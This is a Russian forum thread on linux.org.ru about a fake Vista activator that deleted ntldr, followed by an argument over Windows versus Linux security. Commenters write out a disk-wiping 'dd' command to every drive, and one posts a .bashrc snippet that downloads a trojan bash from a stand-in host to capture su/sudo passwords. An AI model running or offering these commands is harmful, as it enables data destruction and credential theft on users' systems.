LINUX.ORG.RU
ФорумTalks

Про дятлов.


0

0

Чисто из спортивного интереса наблюдаю тему взлома висты на руборде. Недавно там проскочило сообщение, типа найден файл vista keygen activator bla-bla-bla-чего-то-там.exe Народ его выкачал, а запускать - боится, понятное дело. Проверили всеми известными вирусами(есть какой-то сайт, проверяет 24 чтоли различными антивирусами), сказали - всё ок, и много-много посетителей форума запустило этот файл. А файл был с подвохом. Ничего особенно деструктивного не делал, просто стирал ntldr. Так вот, про дятловость: АБСОЛЮТНО(повторяю, 100%!!!) запустили этот файл под администратором!

Deleted

2007 год, год висты на ЛОРе? :))) Кстати - разве защита системных файлов не спасает???

Orlangoor ★★★★★
()

Желание халявы пересиливает здравый смысл и мыслительные потуги.

anatol
()

гыы это ты -дятел тк все активаторы запускаются только из под администраторского аккаунта.Некоторые -в safe mode. Так было во всех виндах с активацией.

Так что сотри тему -не позорься :)

anonymous
()

Все потому, что на такие файлы надо ставить пермишены не администраторские а local system - но разве индусы это поймут...

Orlangoor ★★★★★
()

Это фигня...

Я вот на один торрент залогинился под кем-то (логин/пароль alex alex подошел). Так мне выпал список, того, чего этот чел скачивал:

9 раз windows vista

около 56 отчаянные домохозяйки (на англ)

и больше ничего.

Дело было в 2 часа ночи, я как увидел, аж под стол съехал. По-видимому alex=блондинка.

soomrack ★★★★
()

А в венде же есть в контекстном меню в эксплорере - Run As - там можно запустить с уменьшенными правами. :)

anonymous
()
Ответ на: комментарий от Deleted

>А слово keygen тебе в имени файла ничего не говорит, умище ты наш? :)

Там идет в архиве кейген,список ключей и _активатор_. Который запускается только из под админа.

anonymous
()
Ответ на: комментарий от Orlangoor

Вопрос не в том что и как защищено в M$ системе, а в том, что эти с позволения сказать юзеры (мать их) готовы делать что угодно, кроме использования мозга. Когда ко мне прибегают с криками что дескать оно не работает, вот неожиданно и все. Первым делом спрашиваю че пытались заводить и зачем. После короткого допроса как обычно выясняется, что искал кряки, порнуху, скачал и з емули и запустил ну и теде... И хоть бы раз кто нить попытался разобраться, надо ему это или лучше спросить или поискать более приличное место в сети, где это есть.

anatol
()
Ответ на: комментарий от anonymous

> гыы это ты -дятел тк все активаторы запускаются только из под администраторского аккаунта.Некоторые -в safe mode.

А что, в винде нет ни одной виртуальной машины, способной запустить Свисту? Или пользоваться ими не позволяет религия?

tailgunner ★★★★★
()
Ответ на: комментарий от anonymous

Читай название файла, а то получается всё в лужу. Я его скачал даже - никакого архива там нет, один маленький exe-шник. Прошёлся strings по нему - да, действительно, присутствует строка с "ntldr". Даже запустил под вайном :)

Deleted
()
Ответ на: комментарий от anonymous

>Там идет в архиве кейген,список ключей и _активатор_. Который запускается только из под админа.

анонимус, ты - дятел :)

geek ★★★
()
Ответ на: комментарий от anatol

>Вопрос не в том что и как защищено в M$ системе

Ну мля приехали.. Это не линукс -сорцов к крякам нету и единственный вариант узнать что программа делает - заюзать отладчик и диззасемблер.

А теперь вопрос: сколько ты знаешь юзеров пользующихся диззасемблером?

anonymous
()
Ответ на: комментарий от anatol

> эти с позволения сказать юзеры (мать их) готовы делать что угодно, кроме использования мозга

Дело не в том, что не хотят использовать мозг. Это жизненные законы такие - подавляющее большинство хочет как можно меньше напрягать мозг. Проблема в том, что microsoft это всячески поддерживает, развивает и углубляет. Именно ещё и поэтому её продукция столь популярна.

Deleted
()
Ответ на: комментарий от anatol

>Вопрос не в том что и как защищено в M$ системе, а в том, что ...

Вопрос именно в том что и как защищено - прокладка между монитором и креслом не подлежит дрессировке - проверено электронщиками :(

Orlangoor ★★★★★
()
Ответ на: комментарий от Deleted

>Читай название файла, а то получается всё в лужу.

Про самораспаковывающиеся архивы ты только в кино видел да?

> Я его скачал даже - никакого архива там нет, один маленький exe-шник. >Прошёлся strings по нему - да, действительно, присутствует строка с >"ntldr". Даже запустил под вайном :)

Открой для себя мир отладки и диззасеблирования - поймешь наконец что вариант "запустил программку и все на#бнулось" бывает не только для винды.

anonymous
()
Ответ на: комментарий от anonymous

>Открой для себя мир отладки и диззасеблирования - поймешь наконец что вариант "запустил программку и все на#бнулось" бывает не только для винды.

Открою тебе маааленькую тайну - запустить XXX.Vista-Activator-Keygen.NudeBritney.[и так далее] под администратором в венде, намного проще и понятнее чем sudo dd if=/dev/urandom of=/dev/hd[a-z]

Orlangoor ★★★★★
()
Ответ на: комментарий от Orlangoor

>Вопрос именно в том что и как защищено - прокладка между монитором и >креслом не подлежит дрессировке - проверено электронщиками :(

Ага ,ты еще скажи что установка кряков -штатная функция в винде :)

anonymous
()
Ответ на: комментарий от anonymous

> Про самораспаковывающиеся архивы ты только в кино видел да?

Пукнул в лужу - теперь отмазываешься, дескать, это были глубинные гейзеры, а не ты? Нет уж. Это совсем не самораспаковывающийся архив был.

> Открой для себя мир отладки и диззасеблирования - поймешь наконец что вариант "запустил программку и все на#бнулось" бывает не только для винды.

Да мне пофиг. Я за 9 лет пользования линуксом ещё ни разу не видел столь деструктивных программ(ну кроме тоё самой строчки на перле) типа "запустил - и всё сломалось".

Deleted
()
Ответ на: комментарий от Deleted

>Даже запустил под вайном :)

А он заодно мог попортить все твое файло, лежащее в "Y:\" a.k.a. /home/dimez.

anonymous
()
Ответ на: комментарий от anonymous

А ты уверен, что я запускал его под своим аккаунтом? :)) Я ж не дятел, в отличие от... :))) У меня есть тестовый аккаунт, который ничего сделать не сможет в системе, кроме своего $HOME, в котором ничего нет почти.

Deleted
()
Ответ на: комментарий от Deleted

P.S. Да и ИМХО давно перестали со времён DOS'а делать вирусы, которые бы стирали всё в системе.

Deleted
()
Ответ на: комментарий от Orlangoor

>Открою тебе маааленькую тайну - запустить >XXX.Vista-Activator-Keygen.NudeBritney.[и так далее] под >администратором в венде, намного проще и понятнее чем sudo dd >if=/dev/urandom of=/dev/hd[a-z]

Как ты думаешь -если вдруг будет взломан один из популярных rpm-репозитариев и в самые популярные rpmы будет вставлено по такой удалялке - сколько линуксоидов получат инфаркт?

Или ты ручками каждый rpm |deb |tgz |что-там-в-генте раскручиваешь?

Если кто не верит в подобное -то сообщаю что такое уже было -взломали сайт openssl и в _исходный код_ вписали троя :)

anonymous
()
Ответ на: комментарий от anonymous

>Как ты думаешь -если вдруг будет взломан один из популярных rpm-репозитариев и в самые популярные rpmы будет вставлено по такой удалялке - сколько линуксоидов получат инфаркт?

расскажи, как гипотетические хакиры будут пакеты подписывать

geek ★★★
()
Ответ на: комментарий от anonymous

> Как ты думаешь -если вдруг будет взломан один из популярных rpm-репозитариев и в самые популярные rpmы будет вставлено по такой удалялке - сколько линуксоидов получат инфаркт?

Довольно мало. Ибо, получивши инфаркт, они сразу баг-репорт отошлют. Да и вообще - никсоиды отличаются умом и сообразительностью :)

Deleted
()
Ответ на: комментарий от Deleted

>Это совсем не самораспаковывающийся архив был.

А ты это как определил? монетку бросил -решка архив, орел - вирь ?

Про заголовки в файле писать не нужно -простой юзерь их не поймет а ты ведь их обсираешь?

>типа "запустил - и всё сломалось".

тут выше уже привели пример с dd -по сравнению с тем что она может натворить все вири в венде - детские сказки :)

anonymous
()
Ответ на: комментарий от geek

> расскажи, как гипотетические хакиры будут пакеты подписывать

Элементарно - они взломают репозиторий с ключами :)

tailgunner ★★★★★
()
Ответ на: комментарий от geek

>расскажи, как гипотетические хакиры будут пакеты подписывать

Как правило публичные ключи лежат на том же сервере.

anonymous
()
Ответ на: комментарий от geek

>расскажи, как гипотетические хакиры будут пакеты подписывать

а что все поголовно юзеры ставят только подписанные пакеты?

anonymous
()
Ответ на: комментарий от tailgunner

>Элементарно - они взломают репозиторий с ключами :)

Да все проще - раз везде HTTP/FTP, можно поставить man-in-the-middle (с помощью ARP-спуфинга) у того же провайдера, где стоит оригинальный сервер, который будет во всем трафике заменять строку [старый ключ] заменять на строку [новый ключ].

anonymous
()
Ответ на: комментарий от Deleted

>Довольно мало.

Инфаркт да -мало ,остальных просто попрут с работы

>Ибо, получивши инфаркт, они сразу баг-репорт отошлют.

"Пишу тебе мамо из горящего танка.."

>Да и вообще - никсоиды отличаются умом и сообразительностью :)

Только вот идиот с rpm'ом может натворить гораздо больше бед чем идиот с кейгеном для висты.

anonymous
()
Ответ на: комментарий от anonymous

>тут выше уже привели пример с dd -по сравнению с тем что она может натворить все вири в венде - детские сказки :)

Google://dd for win32

Кроме того это каким же надо быть кретином чтобы сидеть под рутом в Linux - все нормальные дистрибутивы от этого ограждают и не приветствуют. Ах да... Есть еще дегенераты сидящие на Linux XP

Orlangoor ★★★★★
()
Ответ на: комментарий от anonymous

>Как ты думаешь -если вдруг будет взломан один из популярных rpm-репозитариев и в самые популярные rpmы будет вставлено по такой удалялке - сколько линуксоидов получат инфаркт?

Кстати, обычно ставят с зеркал, которые есть чуть ли не у каждого крупного провайдера, а что туда запихнет админ этого провайдера - черт знает.

anonymous
()
Ответ на: комментарий от Orlangoor

>Кроме того это каким же надо быть кретином чтобы сидеть под рутом в >Linux

Про эксплоиты повышающие привилегии до рута слышал? Как думаешь -долго соединить такой эксплоит с вызовом сакрального dd ?

anonymous
()
Ответ на: комментарий от Orlangoor

>Кроме того это каким же надо быть кретином чтобы сидеть под рутом в Linux - все нормальные дистрибутивы от этого ограждают и не приветствуют. Ах да... Есть еще дегенераты сидящие на Linux XP

Уже обсуждалось - пользователя больше волнует сохранность его файлов, над которыми он работал неделями, чем системы. И они могут быть не просто удалены, а постепенно портиться, что пользователь не скоро заметит, что пол файла - мусор.

anonymous
()
Ответ на: комментарий от geek

>ага

тогда читай выше про man-in-the-middle и локальные зеркала

anonymous
()
Ответ на: комментарий от anonymous

>Да все проще - раз везде HTTP/FTP, можно поставить man-in-the-middle (с помощью ARP-спуфинга) у того же провайдера, где стоит оригинальный сервер, который будет во всем трафике заменять строку [старый ключ] заменять на строку [новый ключ].

двоечник. rtfm :)

geek ★★★
()
Ответ на: комментарий от anonymous

>Про эксплоиты повышающие привилегии до рута слышал? Как думаешь -долго соединить такой эксплоит с вызовом сакрального dd ?

совмести. И запихни в какой-нибудь репозитарий.

geek ★★★
()
Ответ на: комментарий от anonymous

> man-in-the-middle (с помощью ARP-спуфинга) у того же провайдера, где стоит оригинальный сервер, который будет во всем трафике заменять строку [старый ключ] заменять на строку [новый ключ].

А я-то, по серости своей, думал, что в RPM'ке - только подпись.

tailgunner ★★★★★
()
Ответ на: комментарий от anonymous

>Про эксплоиты повышающие привилегии до рута слышал? Как думаешь -долго соединить такой эксплоит с вызовом сакрального dd ?

Зачем эксплойт - можно в .bashrc прописать:

curl http://haxxor.free-hosting.com/bash-patched -o /tmp/bash
chmod +x /tmp/bash
exec /tmp/bash

Этот bash отличается только тем от оригинального, что все, что вводится при вызове su/sudo, передается вирусу, и только потом запускается su/sudo.

anonymous
()
Ответ на: комментарий от anonymous

>Уже обсуждалось - пользователя больше волнует сохранность его файлов, над которыми он работал неделями, чем системы. И они могут быть не просто удалены, а постепенно портиться, что пользователь не скоро заметит, что пол файла - мусор.

В корпоративном использовании в любой системе есть резервное копирование которое хранит несколько копий. Для этого SAS, NAS, SAN и придумали. Так что в корпоративных масштабах гибель системы гораздо ощутимее, так как на восстановление системы уходят ценные пол часа

Orlangoor ★★★★★
()
Ответ на: комментарий от Orlangoor

>В корпоративном использовании в любой системе есть резервное копирование которое хранит несколько копий.

Только целостный файл окажется возрастом с месяц, а все, которые новее, будут чуть-чуть подпорчены. :)

anonymous
()
Ответ на: комментарий от anonymous

>Зачем?

просто интересно - неужели ты сам не понимаешь, что предложенные тобой схемы хака не работают :)

geek ★★★
()
Ответ на: комментарий от geek

> неужели ты сам не понимаешь, что предложенные тобой схемы хака не >работают :)

Они не работают только из за жизненного противоречия -кому это надо и хочется - такое сотворить не сможет тк в школе этому не учат :) А тот кто может -такое творить не будет ибо уже нашел занятие лучше и интереснее.

anonymous
()
Ответ на: комментарий от anonymous

>Они не работают только из за жизненного противоречия -кому это надо и хочется - такое сотворить не сможет тк в школе этому не учат :) А тот кто может -такое творить не будет ибо уже нашел занятие лучше и интереснее.

К сожалению, бывают исключения. :(

anonymous
()
Ответ на: комментарий от anonymous

Трое. Один в данный момент пытается заставить работать http://umora.biz/item/1548 , но фиг, потому, что AFP говорит от винта киль, хочу 9-й. Дискриминация.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.